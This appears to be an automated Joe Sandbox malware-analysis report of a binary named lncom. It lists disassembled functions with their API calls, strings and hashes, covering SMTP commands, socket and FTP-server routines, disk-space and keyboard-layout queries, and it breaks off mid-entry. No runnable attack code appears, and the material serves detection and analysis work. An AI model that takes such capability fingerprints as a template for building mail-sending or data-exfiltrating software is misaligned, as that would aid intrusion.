Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$FindText
String ID: ,
API String ID: 575184017-3772416878
Opcode ID: c87cabefaee00362beb315a153c508fcc72b1222e7294248cc502b31549ec3f3
Instruction ID: c1f5fd9f3f667f75e8f3f6626cf8644c99155ac86efa3892e78ce88b184aa6f9
Opcode Fuzzy Hash: c87cabefaee00362beb315a153c508fcc72b1222e7294248cc502b31549ec3f3
Instruction Fuzzy Hash: E4310C3090110EEADF00EFE1D946BEDB3B5FF85308F20456BE804B6252E7B85A059B69

Uniqueness

Uniqueness Score: -1.00%

Function 0044305C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v.LNCOM(00000000,00000000,00000000,000000FA), ref: 004430E0

Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@CheckReady$qqrv.LNCOM(00000000,00442DC3), ref: 00442CED
Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM ref: 00442D9D

@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v.LNCOM(00443168,?,MAIL FROM:<,00000000,00000000,00000000,000000FA), ref: 00443127

Strings

MAIL FROM:<, xrefs: 004430F7
MAIL FROM:, xrefs: 004430CE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: SmtpSmtpprot@$Client@Custom$AnsiAsync$qqr21ExecRequest17StateStringpxusxiynpqqrv$vSystem@$Change$qqr19CheckReady$qqrv
String ID: MAIL FROM:$MAIL FROM:<
API String ID: 4067243851-3099856354
Opcode ID: 9aedf768d37fc8006e5143e502f4a5cacd0d9d44a958a5c4a55e7caf19704615
Instruction ID: e8d946d11e05a0339da844c6ab145df22c7380374f7636315ab9137f83033dc8
Opcode Fuzzy Hash: 9aedf768d37fc8006e5143e502f4a5cacd0d9d44a958a5c4a55e7caf19704615
Instruction Fuzzy Hash: 5C214174A00209AFEB00DF95C982F9EBBB4EF45B05F604066F900A7351D778AF01DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004342D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_getprotobyname$qqrpc.LNCOM(00000000,004343CA), ref: 00434362
@Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004343CA), ref: 0043437A

Strings

WSocketResolveProto: Cannot convert protocol '%s', Error #%d, xrefs: 0043438C
WSocketResolveProto: Invalid Protocol., xrefs: 0043430D

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Error$qqrvLastSocket_Socket_getprotobyname$qqrpc
String ID: WSocketResolveProto: Cannot convert protocol '%s', Error #%d$WSocketResolveProto: Invalid Protocol.
API String ID: 816913132-1255533542
Opcode ID: 1bf5d1ccbfe2b68d40a147ea601475614a9ba736ce512d856b34fb8ef7309f93
Instruction ID: e20e926d59a4e8091ca7fb59d5f80bba06afe72f02084ca6be320896f220de8c
Opcode Fuzzy Hash: 1bf5d1ccbfe2b68d40a147ea601475614a9ba736ce512d856b34fb8ef7309f93
Instruction Fuzzy Hash: 4531F074A00148AFCF00EFA6D982ADDBBF4EF49308F50557BE810A7261D778AE45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044B6DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0044B74B
WSACancelAsyncRequest.WS2_32(?), ref: 0044B708

Part of subcall function 0044AA18: WSAGetLastError.WS2_32(00000000,0044AAC0), ref: 0044AA39

Strings

WSACancelASyncRequest, xrefs: 0044B70D
closesocket, xrefs: 0044B750

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AsyncCancelErrorLastRequestclosesocket
String ID: WSACancelASyncRequest$closesocket
API String ID: 716599516-4005323415
Opcode ID: af08f329ee26ad98e702c8961170a5ba751d0409eda6b3caa5b9acbf939e2fac
Instruction ID: fa34413da0ffc6a1a6540670b6b11353c884128a443808a0faa2187b818c5a49
Opcode Fuzzy Hash: af08f329ee26ad98e702c8961170a5ba751d0409eda6b3caa5b9acbf939e2fac
Instruction Fuzzy Hash: 87219274A00204EFE700DFA9C681D5DB7F8EF89314B2581AAF404AB361C738EE00DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00433240 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

@Wsockbuf@TBuffer@Write$qqrpvi.LNCOM ref: 004332A7
@Wsockbuf@TBuffer@$bctr$qqri.LNCOM ref: 00433272

Part of subcall function 004457BC: @Wsockbuf@TBuffer@SetBufSize$qqri.LNCOM ref: 004457F7

Strings

42C, xrefs: 004332A1, 004332C3

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsockbuf@$Buffer@$Buffer@$bctr$qqriSize$qqriWrite$qqrpvi
String ID: 42C
API String ID: 2537689538-3733377029
Opcode ID: 9d79bb1dc2559818089cd1bcb9f239ea6e6ba2807f4fadbf7f766f64299bba96
Instruction ID: 24950a9d1d4b35946eea41126d4b6333459909101e702f32ba3f79385e0f55d1
Opcode Fuzzy Hash: 9d79bb1dc2559818089cd1bcb9f239ea6e6ba2807f4fadbf7f766f64299bba96
Instruction Fuzzy Hash: 7731C234E00109DFCB40DF99C585AAEBBF1BF09309F5094AAE811AB352C778AE45CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00442F08 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

@Wsocket@LocalHostName$qqrv.LNCOM(00000000,00000000,00000000,000000FA), ref: 00442F49

Part of subcall function 00435CBC: @Wsocket@WSocket_gethostname$qqrpci.LNCOM ref: 00435CCD

@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v.LNCOM(00000000,00000000,00000000,000000FA), ref: 00442F66

Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@CheckReady$qqrv.LNCOM(00000000,00442DC3), ref: 00442CED
Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM ref: 00442D9D

@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v.LNCOM(00000000,00000000,00000000,000000FA), ref: 00442F98

Strings

HELO , xrefs: 00442F54, 00442F86

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: SmtpSmtpprot@$Client@Custom$AnsiAsync$qqr21ExecRequest17StateStringpxusxiynpqqrv$vSystem@Wsocket@$Change$qqr19CheckHostLocalName$qqrvReady$qqrvSocket_gethostname$qqrpci
String ID: HELO
API String ID: 4239222289-929319740
Opcode ID: d9d2c0bb3f4c0257fcd6ce39df3a418f9c6164ff16fa3e7112dbac9789375096
Instruction ID: 640b2b342591b3fc526f926e558f1c1d6152c020312e5dfa9e9006e99d192f10
Opcode Fuzzy Hash: d9d2c0bb3f4c0257fcd6ce39df3a418f9c6164ff16fa3e7112dbac9789375096
Instruction Fuzzy Hash: 3B111F74A14209AFEB04DB91C992BEDB7B9EF45704FE040AAF800A7381D7B46F05D729

Uniqueness

Uniqueness Score: -1.00%

Function 0046277C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(650807DA), ref: 004627F4
RtlDeleteCriticalSection.NTDLL(005DA95C), ref: 004627FE
RtlDeleteCriticalSection.NTDLL(005DA974), ref: 00462808

Strings

HM], xrefs: 00462822

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Delete$CriticalSection$Object
String ID: HM]
API String ID: 378701848-3519355243
Opcode ID: c41fe5a74053778f1788d1926e71c24497c00bdf5f16d4692f278d89de0698f7
Instruction ID: 24f081349361c49d4f09c986c040a67c2e718441fc3a0fa41b5a8b001ea91016
Opcode Fuzzy Hash: c41fe5a74053778f1788d1926e71c24497c00bdf5f16d4692f278d89de0698f7
Instruction Fuzzy Hash: 72011E31203602AFD721FB65ED6291B3B65FB55304352543BF4018B772DAAC9C059B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0043912C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0043913D
GetTickCount.KERNEL32 ref: 0043916F

Strings

., xrefs: 0043919B

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CountTick
String ID: .
API String ID: 536389180-3974621797
Opcode ID: ed3b540da40d12ad786af98aa69720291dffc865faedd1d025a31a5bc7c9b48d
Instruction ID: 91cfae199625ee2d4a8866fff18239368e7cbbad7d6059eb61a3a7944291e993
Opcode Fuzzy Hash: ed3b540da40d12ad786af98aa69720291dffc865faedd1d025a31a5bc7c9b48d
Instruction Fuzzy Hash: 5F110A70D0414ADFEB00CBA9C989B9DB7F2AF49300F1492EAD404AB351D7789E41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 00434B38 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_setsockopt$qqriiipci.LNCOM(00000004,?), ref: 00434B9D
@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00434BB3

Strings

Cannot set linger option at this time, xrefs: 00434B59
setsockopt(SO_LINGER), xrefs: 00434BAB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$AnsiCustomError$qqr17SocketSocket@Socket_setsockopt$qqriiipciStringSystem@
String ID: Cannot set linger option at this time$setsockopt(SO_LINGER)
API String ID: 3480195624-1957915224
Opcode ID: 9ecc564e098ffea046752f8c5d0dd733a8535959e9fe37d637a06e3bb9ae850b
Instruction ID: 9a5ddbfec0b70d67fdb004a8eff61df3b0cc0441cb526ad6bbec39c3bf684199
Opcode Fuzzy Hash: 9ecc564e098ffea046752f8c5d0dd733a8535959e9fe37d637a06e3bb9ae850b
Instruction Fuzzy Hash: A2011774A00148EFDB10CB98C489AEDB7F1AF49304F6592F6E554AB3A1D738AF04DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0048F6AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0048FD5A,00000000,34), ref: 0048F6B2
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0048F6C3

Strings

GetDiskFreeSpaceExA, xrefs: 0048F6BD
kernel32.dll, xrefs: 0048F6AD

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: bf85909d511cb280e675f847368f50a57caf677aeb862435336d4ea31f813734
Instruction ID: 1f6c7da13606c85439f602012b4ae32deac6837e0ed2853e1561a1a55a518283
Opcode Fuzzy Hash: bf85909d511cb280e675f847368f50a57caf677aeb862435336d4ea31f813734
Instruction Fuzzy Hash: D0D067A1A056015AD620BFB2988161E2258A721389B600E3BB40066261FFAC881A9B1C

Uniqueness

Uniqueness Score: -1.00%

Function 0049CEA0 Relevance: 6.2, APIs: 4, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fee83303e0979a4ea75ff19e5f06090f50272754294ffd470caaf5e28ca585b
Instruction ID: 63076bef88967a87134649465437031ad16c812fa008f75d673b4db36148b085
Opcode Fuzzy Hash: 4fee83303e0979a4ea75ff19e5f06090f50272754294ffd470caaf5e28ca585b
Instruction Fuzzy Hash: 52517030A00209EFDF20CF54C8D4BAABB65AB45318F20877BF9218B2D4D7B89945DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043E1C8 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o.LNCOM(?,00000000,0043E2FE), ref: 0043E25B
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo.LNCOM(?,00000000,00000000,0043E2FE), ref: 0043E2A2
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o.LNCOM(?,?,00000000,00000000,0043E2FE), ref: 0043E2B4
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket.LNCOM(00000000,0043E2FE), ref: 0043E2EF

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CtrlFtpsrv@Ftpsrvc@Server@$Directory$qqrp22SmallSocketr28System@%$BuildString$iuc$255%oTrigger$AlterClasses@Data$qqrp22SendSocketStartStreamoString$iuc$255%p15
String ID:
API String ID: 3773880840-0
Opcode ID: 2f896ebcc52f7d3ceece288103475272f7599e4b6a3992dd32e71631589b33bd
Instruction ID: 27fd9fded55c07cdcabc9614b96c20e31cfb129890deb91fd5c34f3f0ebc34a4
Opcode Fuzzy Hash: 2f896ebcc52f7d3ceece288103475272f7599e4b6a3992dd32e71631589b33bd
Instruction Fuzzy Hash: 47412474A04649AFCB00DF9AC891AAFBBB5FF49314F5190BAE808D7391D734AE41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00433594 Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 004335E0
@Wsocket@TCustomWSocket@ASyncReceive$qqrus.LNCOM ref: 00433635
@Wsocket@TCustomWSocket@TryToSend$qqrv.LNCOM ref: 00433653
@Wsocket@TCustomWSocket@ASyncReceive$qqrus.LNCOM ref: 004336BF

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$CustomSocket@$Receive$qqrusSync$ChangeSend$qqrvSocketStateState$qqr20
String ID:
API String ID: 2709473003-0
Opcode ID: f85b256198d1a14075599119fd7d1c17cbef414484eca092d046e609b11f409e
Instruction ID: 7d5c5b01a9fd97044d73e1f13615d50b9558c8219c3f5c9a32decb7170afd119
Opcode Fuzzy Hash: f85b256198d1a14075599119fd7d1c17cbef414484eca092d046e609b11f409e
Instruction Fuzzy Hash: 9751D578A04249EFCB11EF94C189ADDB7B1BF08315F1491D5E8446B362D779AF81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0048E28C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0048E2A9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0048E2CD
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0048E2E8
LoadStringA.USER32(00000000,0000FF64,?,00000100), ref: 0048E37E

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 9adfc3849e9d94ac1a68c517319518f3fdec622cff02dbcff78b7db99a0e8b4d
Instruction ID: 9c80ea416046e13e340be275fdfa6c26b0398421f4115cc6f1035dd3bba8a042
Opcode Fuzzy Hash: 9adfc3849e9d94ac1a68c517319518f3fdec622cff02dbcff78b7db99a0e8b4d
Instruction Fuzzy Hash: E4412F70A002589BDB21EB69CC85BDEB7FCAB18304F0444EBA548E7352D7799F848F58

Uniqueness

Uniqueness Score: -1.00%

Function 0046C1A0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 0046C1C9
GetDC.USER32(00000000), ref: 0046C21E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0046C228
ReleaseDC.USER32(00000000,00000000), ref: 0046C233

Memory Dump Source

